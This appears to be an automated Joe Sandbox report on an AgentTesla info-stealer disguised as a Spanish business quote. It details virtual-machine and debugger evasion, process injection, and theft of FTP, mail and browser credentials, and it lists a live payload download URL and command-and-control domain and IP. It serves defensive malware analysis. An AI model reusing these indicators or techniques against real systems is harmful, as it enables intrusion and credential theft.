            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34335612659.0000000000694000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE BI
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34335612659.0000000000694000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1YCJKSJL72MDS_KR72AMOQUYUYDCIFXY0WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34336131872.0000000002320000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3976Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeSystem information queried: ModuleInformation
            Source: RegAsm.exe, 00000005.00000002.38782014491.0000000000CA8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp2
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34335612659.0000000000694000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe bi
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34336131872.0000000002320000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: RegAsm.exe, 00000005.00000002.38782400221.0000000000CEA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe, 00000001.00000002.34335612659.0000000000694000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000005.00000002.38781651449.0000000000C50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A46950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B00000
            Source: C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
            Source: RegAsm.exe, 00000005.00000002.38783767904.0000000001331000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000005.00000002.38783767904.0000000001331000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000005.00000002.38783767904.0000000001331000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000005.00000002.38783767904.0000000001331000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1408, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1408, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1408, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe28%VirustotalBrowse
            GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe11%ReversingLabs
            GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe100%AviraTR/AD.Nekark.wsjms

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.0.GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe.400000.0.unpack100%AviraTR/AD.Nekark.wsjmsDownload File

            Domains

            SourceDetectionScannerLabelLink
            quantgemfxinvest.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://eFyLKv.com0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://mail.quantgemfxinvest.com0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://WG0ZsvMNHDPKMQFPtKr.net0%Avira URL Cloudsafe
            http://WG0ZsvMNHDPKMQFPtKr.nett-0%Avira URL Cloudsafe
            http://quantgemfxinvest.com0%Avira URL Cloudsafe
            http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe
            http://r3.i.lencr.org/00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            quantgemfxinvest.com
            185.156.219.141
            truetrueunknown
            drive.google.com
            142.250.186.78
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.185.65
              truefalse
                high
                mail.quantgemfxinvest.com
                unknown
                unknowntrue
                  unknown
                  doc-04-9c-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    clients.config.office.net
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-04-9c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k3vc3ju64ugjuf54q6v6uu1oc/1632760800000/13596271228415839806/*/1ycJKsjL72mds_kr72amoQuYUYdcifxy0?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://eFyLKv.comRegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-04-9c-docs.googleusercontent.com/RegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmpfalse
                          high
                          http://cps.letsencrypt.org0RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.c.lencr.org/0RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.i.lencr.org/0RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-04-9c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8kRegAsm.exe, 00000005.00000003.34307315568.0000000000D02000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.34312263979.0000000000CFB000.00000004.00000001.sdmpfalse
                            high
                            http://mail.quantgemfxinvest.comRegAsm.exe, 00000005.00000002.38793925849.000000001DD0D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://drive.google.com/3RegAsm.exe, 00000005.00000002.38781778105.0000000000C78000.00000004.00000020.sdmpfalse
                              high
                              https://drive.google.com/sRegAsm.exe, 00000005.00000002.38781778105.0000000000C78000.00000004.00000020.sdmpfalse
                                high
                                http://r3.o.lencr.org0RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000005.00000002.38793049140.000000001DC53000.00000004.00000001.sdmpfalse
                                  high
                                  http://WG0ZsvMNHDPKMQFPtKr.netRegAsm.exe, 00000005.00000002.38793335913.000000001DC8D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://WG0ZsvMNHDPKMQFPtKr.nett-RegAsm.exe, 00000005.00000002.38793335913.000000001DC8D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://quantgemfxinvest.comRegAsm.exe, 00000005.00000002.38793925849.000000001DD0D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cps.root-x1.letsencrypt.org0RegAsm.exe, 00000005.00000002.38800291967.000000001FDC9000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://r3.i.lencr.org/0RegAsm.exe, 00000005.00000002.38799907527.000000001FD84000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.186.78
                                  drive.google.comUnited States
                                  15169GOOGLEUSfalse
                                  185.156.219.141
                                  quantgemfxinvest.comSpain
                                  201942SOLTIAEStrue
                                  142.250.185.65
                                  googlehosted.l.googleusercontent.comUnited States
                                  15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:1371
                                  Start date:27.09.2021
                                  Start time:18:37:55
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 42s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:12
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.evad.winEXE@4/1@4/3
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 96%
